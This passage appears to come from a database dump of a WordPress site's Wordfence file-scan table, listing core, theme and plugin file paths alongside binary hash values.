Ϣ*N��','',0,'?'),('o1i�L5���z�$��7','wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u1��\\�8���;#j-','P����|�l�_���Z��3z<NɧK���','',0,'?'),('oC�\"���Q���t��y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�����%','�4!��H�:�6>�lE��Ec#���a{�A�{','',0,'?'),('oP�c����o�.�r','wp-includes/js/tinymce/skins/lightgray/img/object.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rdP�E}u\n/M�A�� ','��#;!��I��.�>�uʍ�SV��m{|�e-','',0,'?'),('oS]�~(��7;�\r�','wp-includes/js/dist/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʼ�����|���U','��9j�Z�-�T�(�(�kC�����r�uS�','',0,'?'),('oZ0�������<c�0','wp-includes/SimplePie/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��9,�zӄycE�','Ye��k����\Zk�t~�n4�&�����p#�Ӝ','',0,'?'),('o}�C܊8�E��G�','wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rW�+�`Akæ�V r','U���mְ�E2�e�Io�#�z^aŁ���$G�','',0,'?'),('o�j̄��C-#|E�','wp-content/plugins/wp-cerber/assets/flags/ag.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g(4e���j52^G','��2�M�`O���?iX�e�B�q����x��','',0,'?'),('o�w*�\nΛ΢GҜ�]','wp-content/plugins/wordfence/modules/login-security/img/header.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('o㮚-�;?X:��pҡ','wp-trackback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ьWe=]!B��','��\'ߵ���3�M؞Ø��5���c�o�M�U�%','',0,'?'),('o���Y��څ��X�','wp-content/plugins/wordfence/images/flags.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W7� ��(�˿!�\Z7�','Bx�0%Ly�6���!��X\\z/<�n�6=\ZW�','',0,'?'),('o�[��n3u��ʹ�P5','wp-admin/options-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O+�٢���%ڦS�','Y�*7:��!ȡ˦�Ak}���w��2��Z1','',0,'?'),('p��7u�L�_{2Û�','wp-includes/js/jquery/ui/draggable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���\\O��Љ/�Hp%','�N��B\0�!8\r���o? �)E�C>��','',0,'?'),('p�?وU���\0˜','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-cronjob-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�}�$c�{G�(�P','��H�M�c�6�v�H�@�EmO2\'5�n�ҬX��','',0,'?'),('p{\r�� �%>/�Z��:','wp-content/plugins/wordfence/views/scanner/issue-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m|�&vfƲ~��','�i\"��m�$�PyM����d��	���S�','',0,'?'),('p:�,�`OlL�(�A','wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�~�H���7�<�B��','\0!�F�E���KP��7߻�0��\n;6�}��$','',0,'?'),('pB���e�Gߴ^���R�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)/4;�$۔�ެvi\\','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('pUy�a	�b��va�;�8','wp-includes/js/comment-reply.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���D6����x�','!�x��G�����Go�Df�B8xXC�','',0,'?'),('p��.а��[ÍD�','wp-includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���X�;|N.��S_d�?','S5�g���*����r����x�{��&','',0,'?'),('p��\\*e�\n\rψ��','wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�83�?w�����W','\r.l]\\)	Z�q���p�]_^�u����J\n�%�','',0,'?'),('p̓0�2@��PF�tk','wp-content/plugins/wordfence/views/common/unsubscribe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y:h3�>��a ݑ�4~','E�q����Tg��O>F-��O�(�IƚZ��z','',0,'?'),('p�}G��J��$��x','wp-includes/block-supports/align.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v(\0����1�i�`','��=o�.�k�4�Ŋ*�P\\������[�','',0,'?'),('p����b�~�oBk�Z','wp-content/plugins/akismet/class.akismet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~—<��p���k�','	�;\0[���FsY\ZΧ��`�Qx����\"�m','',0,'?'),('p��u�w��S�ɴ0�','wp-content/plugins/hello.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��t�5\0���P��w','f��s��	u�c����~���0b����I�&5)','',0,'?'),('qqC��$�����@','wp-content/plugins/wordfence/views/common/page-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u3�^1!��Gѩ}:�L','8^!c�$u��w�y��)�+	&�&���<�','',0,'?'),('qs��A�t���d�\\','wp-includes/js/dist/warning.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@AUV����x��\0�','%|�l��U}}�@~�\\<��#��x�9�a\n��','',0,'?'),('q\"�co���>�2Rh�]','wp-admin/includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c��)��yf��t���','���!��������g|:ڧq�*օxɚI�t� ','',0,'?'),('qL���I�Lc�','wp-includes/class-wp-recovery-mode-link-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����}f/c�nx5','�k�������ޙ(Z��t�M\0��;�t\r','',0,'?'),('qQ��s��W��i��i�','wp-content/themes/magazine-hoot/hybrid/customize/control-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�d�2Z6��n\"eJ�/','��m��w�$	mNw(�<\ZʻT���!��\n�','',0,'?'),('qh�665�y|�=�?S	','wp-includes/js/jquery/jquery.serialize-object.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�D�B\ru�6����!','��`�RԶ�2ɀ�`��Mx��i�G�fz�C2�','',0,'?'),('q��f���EH�7�d�','wp-includes/css/dist/editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���Ey��,��~','��t>\'�\"A�†ˊ��	�QN��\Z�gH��','',0,'?'),('q�^�YD�t;ELN��\n','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('q�s���ƞ�ù��','wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����!�Й�~L�C��','֓�2ǟ��lq�~�<%Z����g����','',0,'?'),('q��F~IfD�ө� xZf','wp-content/plugins/wordfence/css/diff.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܀g	��	�$���`r�Q','��$��hEJ^54<$�ӭYc���’�&','',0,'?'),('q����R+�q�\Z�2�','wp-includes/js/dist/edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�):����sL?&��','�I��R=E\Z��`֚m٪�p\Zt~�#�`I��','',0,'?'),('q�0\\y*3�Q�>vJ�','wp-content/plugins/wp-cerber/assets/flags/tw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ښ��� .�;���X','U��Ӥ�SQ��׈�{�5�𐮆c-y��','',0,'?'),('q�0���������5','wp-includes/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5O&?��E�	��%','^%%�hT��,�����k2�Ȯn=n%:��','',0,'?'),('q��5@�*=�&��\\X�','wp-content/plugins/wordfence/lib/wfHelperBin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��!�ȍ��4Q��X#','��չ%-�^�q��U�q�M��eY���','',0,'?'),('q�$\'6�e��-W]','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nb�x	��BC��?���\Z','��e��C8�&\r����h\r��2w�(^Й�V\0','',0,'?'),('r[��s2<�����u','wp-content/themes/twentytwentyone/assets/sass/06-components/posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g<Q�P�;�z��[Ѩɹ','����j�Qo���<>�\n��Y�����g1�b','',0,'?'),('r��h��v��Lk/��','wp-admin/network/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q#��ԑ��\Z;f��','��3PJݎ��Y��b�GqA��8œo:?��>�','',0,'?'),('r+zk;� 4��WI','wp-includes/js/tinymce/themes/modern/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(3�o�U�2ŝU�2�','�2.�pt�\"r�`)��\r.C�l�\\\Z��BIX','',0,'?'),('rI\0yg�E!���2\0C','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����mx�f�4	\"','���H&�(hn�U�-z$���&��Egj[�M�','',0,'?'),('r_��YrL�8�;��8E','wp-content/plugins/wp-cerber/assets/flags/ua.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V	i��#Ʉ\r','�۽����,jI�7=3I�\0������\"�M7H','',0,'?'),('re��\'۷�11d��8�','wp-content/themes/twentytwentyone/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b/��RפH�{V���','2@:Uo�+�UJ7���˄�&yS���c�j��','',0,'?'),('rt�IŒg[��;���?','wp-includes/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rV�N�ck0�}/�Ճ�','n�K��kZ��	���� N$ � EК���e�$','',0,'?'),('r��)����d��RD�2','wp-content/plugins/wordfence/js/wfdashboard.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Խ�P����`�{i�','=P�z�r���!�?w\Z�/d!��LӪ��1!�','',0,'?'),('r�(n՞���j��b\"','wp-admin/js/media.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҋ$����(����','���sݝ���&��գʆ#�_�`�X','',0,'?'),('r��O�r\0�C<o�b#�j','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�ҵ�F��K�K��$��','���w�U��*S�������0ϙ�P7z�','',0,'?'),('r�3�e\\��,S�q','wp-includes/class-wp-block-supports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��C��ie�4���','�8r�ƻ�Iz�R��1L��u?-����','',0,'?'),('r�_�/��HG=�%�<�','wp-includes/images/arrow-pointer-blue-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�rތ]4�9c�','��{&DO�z��A�f�/��gá������A]~�(�','',0,'?'),('r�r�(J�g�(�y�t','wp-includes/js/mce-view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2s�H��ّ;[���	s','��8`9ڰn�-.�	H�Dp��k+�γ��bI','',0,'?'),('r�)�����e�l�','wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�j��u9)�\n6�5','gg(($C���(rw�H\n�O���D!\rl��a�','',0,'?'),('r��\n��b��#��','wp-admin/css/media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���f�}��E\\','E�:�#��P�c;�&��T�$G@�\Zrp�J�iR','',0,'?'),('r�7��/y*�aڛP] 0','wp-content/plugins/wordfence/views/blocking/blocking-create.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�٥r��zż��S�5�','D{%WQ����Ȱ2����-\\�����l','',0,'?'),('s&�繗�DCl�s�H','wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������!�<�9�Ӫ','��:̶&E �\0@ؼ�k�P�	�n2R�I�','',0,'?'),('s�As�Y����D]','wp-content/plugins/wordfence/views/scanner/options-group-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����Co���>~�','#�~���6��˞45���LW���V��^�','',0,'?'),('s+q��6�l|c�JzA','wp-content/themes/magazine-hoot/js/jquery.fitvids.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�tkd�����B�','<�ٵP�H���LVM���+�$�l�7{����','',0,'?'),('sRk\\��a�eg��(�C','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/5_preview.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i2	nr�T\r�E�Oy���','}�-���\\��.KI\\r�螰���LI�[','',0,'?'),('s��ӣJ���~��k','wp-content/plugins/akismet/views/stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�JJuw��&�R{��','w�ü}\Z�O�g��� f#�E�1g=g�Rz��F','',0,'?'),('s�E�Ξq�p�B���','wp-admin/css/widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x[ʦ�]��M	��','Y�g_��~��\"��%��ٍ���[#u�دv�','',0,'?'),('s��(:ӣ$������\r','wp-content/themes/twentynineteen/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�x̣���ۍJ��','�����X�e�����M�<!K��\0��ᆧ','',0,'?'),('s�]��P�f���\n','wp-content/themes/twentynineteen/sass/variables-site/_columns.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�+<����>3���K','w�0�̃�|^�;�Ym����n�L��i2��4�','',0,'?'),('s�ŏU\'���e@�d�','wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ғ:�K�[�Iw\\��g�','`e��	�n��O���JM�%�N�hA�{gh�f','',0,'?'),('s��4�����R�X>O�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('s��˱�Y*u���O�','wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*q��BIt�ӟA<\"','6qQ���`�d!cf��.�Bxq','',0,'?'),('s���*TV�1�oE','wp-includes/js/jquery/ui/effect-blind.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{5���%�ko','��0ʟ\0`rz){쥵3�[��[q[��ٵ','',0,'?'),('s�C4M�*��*B�)�','wp-includes/css/wp-pointer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HB���v��}�d~�','�72�4����.���ҷCŧ�Z���;7Fr�b','',0,'?'),('t\r�[��Ձ9*5W�b��','wp-includes/block-patterns/text-two-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�ۆe���9���!>','bP9���ޤyP���g��\"��Ę��\"V�','',0,'?'),('t�{*��aM��r̎','wp-content/plugins/wp-cerber/assets/flags/tt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wp}y����œ�_.�','D�qY\'�?t���}�u���t!��_r^��','',0,'?'),('t/�����Ji6WX��','wp-includes/class-wp-recovery-mode-cookie-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�-�����*xrf�','�8�-�H0F�y���G����������Nj�','',0,'?'),('t6��O�\ra��Ȇ�f','wp-admin/js/plugin-install.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ct��ݦq�CI','�T�xY�q���*��sP�J�ƶ.���+ʩ�Z','',0,'?'),('t8����p�̋�z{jDp','wp-includes/css/buttons-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��ԝ]z~c6���g6','�L�X橕f��\Z�tC5�i�fS�(�R�&�=�','',0,'?'),('tU�/Ds�Iڤ�st�','wp-includes/js/wp-auth-check.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�L�A��`�2ڴ�Hd','O���f����s����0B��9��Z_��2','',0,'?'),('t[[�=�6u7;Y��T�','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4s[���lAc4�f���','ƺ�>�y�.~yK�^�)*f�����6F�','',0,'?'),('tm6ۗ�q���.��=j','wp-admin/css/colors/blue/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bq�9���\ngI�+','�(���%�$CkO\r����=0�d[qˡ�','',0,'?'),('tm�\n��GO	\'�\Z޵','wp-includes/js/jquery/ui/mouse.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����IJi��\r���','�P��<\n��+�q� ™��NJ�+��s���b���','',0,'?'),('t�����.�Õ�81�','wp-includes/random_compat/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nM@<��A6�@!�Y��','.#�$.N�.��\\\"�Cuj�%H��EJֈ^a','',0,'?'),('u�6��4E~�:��','wp-content/plugins/wordfence/images/icons/working-indicator.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����VF���{N	�\'G','�fX��RZ�|:O�b��=f�[y���5 ~	','',0,'?'),('u!��+��\Z����','wp-includes/SimplePie/Cache/Redis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o.*h�`|,{���mg','�Yj�q��O�L����1����v��|�b�}|U','',0,'?'),('ue�,\"\n	�h�g.','wp-admin/css/colors/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X`��oi�`Hx���C','���d�pe܊&��΁�����������s-�','',0,'?'),('u����[������D','wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��:o;J��\n���b','[d�%>��[�l�����[�,0o_IX>ڦ2�','',0,'?'),('u��I5q�#��,>�','wp-content/themes/twentytwentyone/assets/js/primary-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ɱ�\rA2���e','ʟ�]b���F��ң���^�Ex��D�','',0,'?'),('u��3!pA�f�)R�M�','wp-includes/js/tinymce/plugins/wpgallery/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�vQ8_�$�?��','<��A0�6kJX\nvA/��%O�-v_���\'p�A@ئ','',0,'?'),('u�m-O��\'ߝ�]�#','wp-includes/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HDf��ae���z��R','㶜\\��L>L�N-@G\'��tmG��i��kR߮g\0','',0,'?'),('u�qg\Z\0�8�hԭ�\0�','wp-admin/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y����&�','�Θ�4��C�w@�Xdo��N=w���<~o�','',0,'?'),('u�:�z�2�DQ��4','wp-includes/blocks/tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@{�\Z9ڛ���S6��1','��1�ʪ���V�IT/���m�w/(\'��t�+�','',0,'?'),('vڴ����V���K��P','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���PNڡ\'f���','\r]�~[�������_˳�P�B�TA`��*,O','',0,'?'),('v�)F��~q���?b','wp-admin/includes/class-plugin-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZE)�-0�M�;���h','2ꦢ�3l\'k��c�{�=ߺ��$[��&Of��','',0,'?'),('vK;@�s�aU1;�	^�','wp-config.php',0,'�r4�R*Ƅ�`\'a\Z�','�r4�R*Ƅ�`\'a\Z�','����δ\\��]EӔ�r�⼝�B�w��=�jz','',0,'?'),('vLM�.f���%OMR','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�V+=?k�\r���','_����x:�nOsO�:d�\'\0�N=���k�','',0,'?'),('vM�m*&Z�`\'/b�+','wp-includes/js/jquery/ui/effect-puff.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CH��w�d���֞','s� LMÖ�,sK���\Z~Q#�.0W�N׳_~','',0,'?'),('ve׶\\�l.�х{','wp-includes/js/dist/vendor/wp-polyfill-formdata.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�883������x��\r','��X�����r�q-��N)��nhl�L�$���','',0,'?'),('vi�fuP�0^�>d��','wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��SG��˺��F���','[�(��R�������$��2o���t�b��','',0,'?'),('vw��@�H��z�F�','wp-admin/ms-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UjA�ڦYq�u��	','���\"G\n��ڔ���Mh�Q�2��l�\'�ܵ�','',0,'?'),('v}P�`~��|$�7�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r��2�<9Ѿ�_J�','�xSh���IcU9�X�<FfjT\'h�چ��D�','',0,'?'),('v]�z������3�tB','wp-admin/includes/class-wp-importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�L\0�4Wd�n�tG��','X\\�m��ؓ�>^\'�_4У��4ԗ����uV0','',0,'?'),('v��ޣ�R�','wp-includes/js/jquery/jquery-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�6��?ٳ��t�\r','t��&�hp�z���wĝ�&��Ś9&�7����v','',0,'?'),('v�����v̞e�tѿ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Oa��Y�?ai�0@6','\r�L&ބ��\0�}����mu�LJ���i..5G��l','',0,'?'),('vâ,\\�+Q�����֧','wp-admin/css/l10n-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OS�GfK罚�8��]','�d�x���k3r��ްVNĪ�e��t��-�����','',0,'?'),('v�G�.�g�A��#�r�','wp-admin/images/align-right-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�l�>r�]�lW��x','�V:�h���#ȆBT�5i\0�?��c�Bc���','',0,'?'),('v���4�|>�<����','wp-admin/js/xfn.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������8��B#','���{)�\"�;?�ϙXGDI�RD?K@^X���P','',0,'?'),('v�{#��l��b\0}��B','wp-admin/css/colors/light/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��l� ճ=���}�','����40Y0ĽH��8���{V�7(@��0','',0,'?'),('v�^/�����g�˵3�','wp-content/themes/magazine-hoot/hybrid/extend/includes/scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bl�V�D�k�@��y��','�.I�L�f�v��\\LX����̤�tjZ�i>d','',0,'?'),('v�Ҹ);�D��~J\"�q','wp-includes/js/jquery/jquery.form.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Њn=i���f���5]','�5\\�\'=\'�*m%,�kC!<���2�m=�','',0,'?'),('wu�l|��p��Q','wp-includes/js/autosave.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CGs|I�\"�~�}}c','#��ð�|�d�L��W���kY�W�](�y;�','',0,'?'),('w��y�f]l2B�|H','wp-content/themes/magazine-hoot/hybrid/css/one-five.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g)䛰�<�.��Z\ZO','.9�CS�%�ئ��6E_er����[�*!�','',0,'?'),('wDI��-E��I�l�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��%�a;B3>|CX��','B;,�y��_�:�$������E5��B0��\0','',0,'?'),('wDZ/�I�E�20y	ק','wp-content/plugins/wp-cerber/assets/flags/pf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S����\'�>�Gx��:�',' �5�C����}Z��;�T��q,H-�˻�','',0,'?'),('we��j�Z�q�I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�,�����Eڎ�;','5+�S�sY>%�r9�7�5[I�=�`<2M��','',0,'?'),('w���L��0���]r.','wp-includes/images/crystal/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�1�����1�9',';�67����\r�!����x\Z_@H��&C��-��','',0,'?'),('w�@�I�e��R�f�7��','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����h�R���','���=�mH��/�\ne��C��3�u58�','',0,'?'),('w��`M��>�{���','wp-admin/includes/noop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�qj����\Z!�\r:�','dˎJ��������P[\n=��Qc����P�','',0,'?'),('wË���9/,+1��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�� �Z8�t\"','avxu��흶j��=�I�S��D{����!','',0,'?'),('w������:}V��P','wp-admin/js/common.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�Wi,>�z�','4��3ײ>b/?�Rx��ʚ?;��Z��7�R�','',0,'?'),('x	G!N�$�.�d�Tb�','wp-includes/ID3/module.audio-video.flv.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�����w�I�@��',';hg�D�)\r�:n���e8c������\"�.�','',0,'?'),('x9@^6��ߑ��o��','wp-includes/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('xIH�.�9�Y��BO','wp-admin/css/colors/coffee/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!QD�h�4�����','���O��eV‹T`N6bqIO7�M\n���^�8','',0,'?'),('xLKx ��2��Is�!#Q','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�U������CB\"','��)M���쩂tU��δ�Ԫ���F.�','',0,'?'),('xV�M��>�n�{O�ǟ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I,0�`�-=�OxH��','Ⰱm�Wka���2��Sj�>����\"�w�<','',0,'?'),('x\\Qx:�����-','wp-content/themes/magazine-hoot/template-parts/content-archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{d R�YR�ٺ!�','dj�8I���1 ��Y07�b	�)e�j�TK��}','',0,'?'),('xy�!��q�)�.ˉ\"','wp-content/plugins/wordfence/images/sort_desc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m����͟��r�� 9',';	�_�Y���t�7K��s��mC��\r����o','',0,'?'),('x�^m�]̲�/��L4vU','wp-admin/includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҹ�h�4q�paT0��','̡��pr\n��Y���aZ|�i�S��,��/��','',0,'?'),('x��n�8I�Y���1�','wp-content/themes/twentynineteen/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6��7������p','����X��:*�N�Y�/���\"�d�[Ï��','',0,'?'),('x덂��@}Y��i�+','wp-includes/js/tinymce/plugins/tabfocus/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ώ�